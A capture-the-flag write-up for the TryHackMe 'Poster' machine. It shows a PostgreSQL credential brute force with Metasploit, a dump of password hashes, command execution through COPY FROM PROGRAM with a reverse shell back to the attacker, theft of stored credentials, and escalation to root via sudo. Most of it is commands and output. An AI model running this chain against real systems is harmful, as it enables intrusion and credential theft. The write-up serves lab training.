THM Writeup – Poster
The sys admin set up a rdbms in a safe way.
What is rdbms?
Depending on the EF Codd relational model, an RDBMS allows users to build, update, manage, and interact with a relational database, which stores data as a table.
Today, several companies use relational databases instead of flat files or hierarchical databases to store business data. This is because a relational database can handle a wide range of data formats and process queries efficiently. In addition, it organizes data into tables that can be linked internally based on common data. This allows the user to easily retrieve one or more tables with a single query. On the other hand, a flat file stores data in a single table structure, making it less efficient and consuming more space and memory.
Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database. RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.
Are you able to complete the challenge?
Add IP address to your hosts file:
echo '10.10.35.173 poster.thm' >> /etc/hostsScan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv poster.thm
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
[REDACTED]/tcp open postgresql syn-ack ttl 64What is the rdbms installed on the server?
What port is the rdbms running on?
Get more details about open ports:
nmap -T4 -A -p 22,80,5432 poster.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
[REDACTED]/tcp open [REDACTED] [REDACTED] DB
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
| Fpostmaster.c
| L2015
|_ RProcessStartupPacket
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
|_ssl-date: TLS randomness does not represent timeAfter starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
Start Metasploit:
msfconsoleSearch for an associated auxiliary module that allows us to enumerate user credentials:
msf5 > grep auxiliary search postgres
0 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
1 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
2 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
3 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
4 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
5 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
6 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
-->7 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
8 auxiliary/scanner/postgres/postgres_schemadump normal No Postgres Schema Dump
9 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
10 auxiliary/server/capture/postgresqlWhat are the credentials you found?
Select the module we found and display its options:
msf5 > use [NUMBER_REDACTED]
msf5 auxiliary([MODULNAME_REDACTED]) > show options
Module options ([MODULNAME_REDACTED]):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit-framework-5101/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit-framework-5101/data/wordlists/postgres_default_userpass.txt no File containing (space-separated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /opt/metasploit-framework-5101/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE trueWe need to set RHOSTS only:
msf5 auxiliary([MODULNAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thmNow run the exploit:
msf5 auxiliary([MODULNAME_REDACTED]) > exploit
[-] 10.10.35.173:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.35.173:5432 - Login Successful: [REDACTED]@template1
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.35.173:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedWhat is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
Search for a module that allows you to execute commands with the proper user credentials (starting with auxiliary):
msf5 auxiliary([MODULENAME_REDACTED]) > grep auxiliary search postgres
0 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
1 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
2 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
-->3 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
4 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
5 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
6 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
7 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
8 auxiliary/scanner/postgres/postgres_schemadump normal No Postgres Schema Dump
9 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
10 auxiliary/server/capture/postgresqlBased on the results of #6, what is the rdbms version installed on the server?
Select the module to use it and display its options:
msf5 auxiliary([MODULENAME_REDACTED]) > use [NUMBER_REDACTED]
msf5 auxiliary([MODULENAME_REDACTED]) > show options
Module options ([MODULENAME_REDACTED]):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port
SQL select version() no The SQL query to execute
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose outputSet RHOSTS and PASSWORD:
msf5 auxiliary([MODULENAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 auxiliary([MODULENAME_REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]Now run the exploit:
msf5 auxiliary([MODULENAME_REDACTED]) > run
[*] Running module against 10.10.35.173
Query Text: 'select version()'
==============================
version
-------
PostgreSQL [REDACTED] on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] Auxiliary module execution completedWhat is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
Search for a module that allows for dumping user hashes (starting with auxiliary):
msf5 auxiliary([MODULENAME_REDACTED]) > grep auxiliary search postgres
0 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
1 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
2 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
3 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
4 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
5 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
-->6 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
7 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
8 auxiliary/scanner/postgres/postgres_schemadump normal No Postgres Schema Dump
9 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
10 auxiliary/server/capture/postgresqlHow many user hashes does the module dump?
Again, select the module and display its options:
msf5 auxiliary([MODULENAME_REDACTED]) > use [NUMBER_REDACTED]
msf5 auxiliary([MODULENAME_REDACTED]) > show options
Module options ([MODULENAME_REDACTED]):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres yes The username to authenticate asSet RHOSTS and PASSWORD:
msf5 auxiliary([MODULENAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 auxiliary([MODULENAME_REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]Run the exploit:
msf5 auxiliary([MODULENAME_REDACTED]) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedWhat is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
Search for a module (starting with auxiliary) that allows an authenticated user to view files:
msf5 auxiliary([MODULENAME_REDACTED]) > grep auxiliary search postgres
0 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
1 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
-->2 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
3 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
4 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
5 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
6 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
7 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
8 auxiliary/scanner/postgres/postgres_schemadump normal No Postgres Schema Dump
9 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
10 auxiliary/server/capture/postgresqlWhat is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
Search for a module that allows arbitrary command execution with the proper user credentials (starting with exploit):
msf5 auxiliary([MODULENAME_REDACTED]) > grep exploit search postgres
11 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
12 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
-->13 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
14 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
15 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution
16 exploit/windows/postgres/postgres_payload 2009-04-10Compromise the machine and locate user.txt
Select the module to use it and display its options:
msf5 auxiliary([MODULENAME_REDACTED]) > use [NUMBER_REDACTED]
[*] Using configured payload cmd/unix/reverse_perl
msf5 exploit([MODULENAME_REDACTED]) > show options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
DUMP_TABLE_OUTPUT false no select payload command output from table (For Debugging)
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port (TCP)
TABLENAME u6XtFEis1x yes A table name that does not exist (To avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 AutomaticSet RHOSTS, PASSWORD and LHOST:
msf5 exploit([MODULENAME_REDACTED]) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 exploit([MODULENAME_REDACTED]) > set LHOST 10.10.137.243
LHOST => 10.10.137.243
msf5 exploit([MODULENAME_REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]Now run the exploit:
msf5 exploit([MODULENAME_REDACTED]) > exploit
[*] Started reverse TCP handler on 10.10.137.243:4444
[*] 10.10.35.173:5432 - 10.10.35.173:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.35.173:5432 - Exploiting...
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x dropped successfully
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x created successfully
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x copied successfully(valid syntax/command)
[+] 10.10.35.173:5432 - 10.10.35.173:5432 - u6XtFEis1x dropped successfully(Cleaned)
[*] 10.10.35.173:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.10.137.243:4444 -> 10.10.35.173:56678) at 2022-02-07 09:29:02 +0000
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)Look around a little bit:
ls -lA /home
total 8
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 alison
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 darkThere are 2 users: alison and dark.
List alison’s home directory:
ls -lA /home/alison
total 32
-rw------- 1 alison alison 2444 Jul 28 2020 .bash_history
-rw-r--r-- 1 alison alison 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 alison alison 3771 Jul 28 2020 .bashrc
drwx------ 2 alison alison 4096 Jul 28 2020 .cache
drwxr-xr-x 2 alison alison 4096 Jul 28 2020 .nano
-rw-r--r-- 1 alison alison 655 Jul 28 2020 .profile
-rw-r--r-- 1 alison alison 0 Jul 28 2020 .sudo_as_admin_successful
-rw------- 1 alison alison 35 Jul 28 2020 user.txt
-rw-r--r-- 1 root root 183 Jul 28 2020 .wget-hstsWe found user flag, but we don’t have permissions to read it – we need to be alison to read it.
List dark’s home directory:
ls -lA /home/dark
total 20
-rw------- 1 dark dark 26 Jul 28 2020 .bash_history
-rw-r--r-- 1 dark dark 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31 2015 .bashrc
-rwxrwxrwx 1 dark dark 24 Jul 28 2020 credentials.txt
-rw-r--r-- 1 dark dark 655 May 16 2017 .profileThere is an interestingly named file credentials.txt, read it:
cat /home/dark/credentials.txt
dark:[REDACTED]Great, we have credentials to dark’s account, login via SSH:
root@ip-10-10-137-243:~# ssh dark@poster.thm
The authenticity of host 'poster.thm (10.10.35.173)' can't be established.
ECDSA key fingerprint is SHA256:9sVne2iRYnXtCm1g5M0jwlzBMg0GmByloIG6c7gDlgA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'poster.thm,10.10.35.173' (ECDSA) to the list of known hosts.
dark@poster.thm's password:
Last login: Tue Jul 28 20:27:25 2020 from 192.168.85.142
$ id
uid=1001(dark) gid=1001(dark) groups=1001(dark)
$ Now, transfer linux enumeration script linpeas.sh to the target machine.
Run http server on your attacking machine:
root@ip-10-10-137-243:~# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Download the linpeas.sh to the target machine:
$ wget http://10.10.137.243:8000/linpeas.sh
--2022-02-07 02:01:52-- http://10.10.137.243:8000/linpeas.sh
Connecting to 10.10.137.243:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 233380 (228K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 227.91K --.-KB/s in 0.08s
2022-02-07 02:01:52 (2.88 MB/s) - 'linpeas.sh' saved [233380/233380]Make the script executable and run it:
sh linpeas.sh | tee -a linpeas.logThe log file is not readable on the target machine, so transfer it to your attacking machine – run http server on the target machine:
$ python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 ...Download it to your attacking machine:
root@ip-10-10-137-243:~# wget http://poster.thm:9000/linpeas.log
--2022-02-07 10:11:32-- http://poster.thm:9000/linpeas.log
Resolving poster.thm (poster.thm)... 10.10.35.173
Connecting to poster.thm (poster.thm)|10.10.35.173|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90757 (89K) [application/octet-stream]
Saving to: \u2018linpeas.log\u2019
linpeas.log 100%[===================>] 88.63K --.-KB/s in 0.001s
2022-02-07 10:11:32 (135 MB/s) - \u2018linpeas.log\u2019 saved [90757/90757]Now read the log file:
less -R linpeas.logI noticed this:
Let’s check that file out:
$ cat /var/www/html/config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "[REDACTED]";
$dbname = "mysudopassword";
?>Awesome, let’s try if the password also works for SSH:
root@ip-10-10-137-243:~# ssh alison@poster.thm
alison@poster.thm's password:
Last login: Tue Jul 28 20:35:40 2020 from 192.168.85.142
alison@ubuntu:~$Yes, we are logged in as alison.
So now read the user flag:
alison@ubuntu:~$ cat user.txt
THM{[REDACTED]}Escalate privileges and obtain root.txt
Now we need to escalate our privileges to root user – let’s try basic vectors:
alison@ubuntu:~$ sudo -l
[sudo] password for alison:
Matching Defaults entries for alison on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alison may run the following commands on ubuntu:
(ALL : ALL) ALLGreat, alison can execute all commands with sudo.
So simply switch to root user and read the root flag:
alison@ubuntu:~$ sudo su
root@ubuntu:/home/alison# cat /root/root.txt
THM{[REDACTED]}Do you like this writeup? Check out other THM Writeups.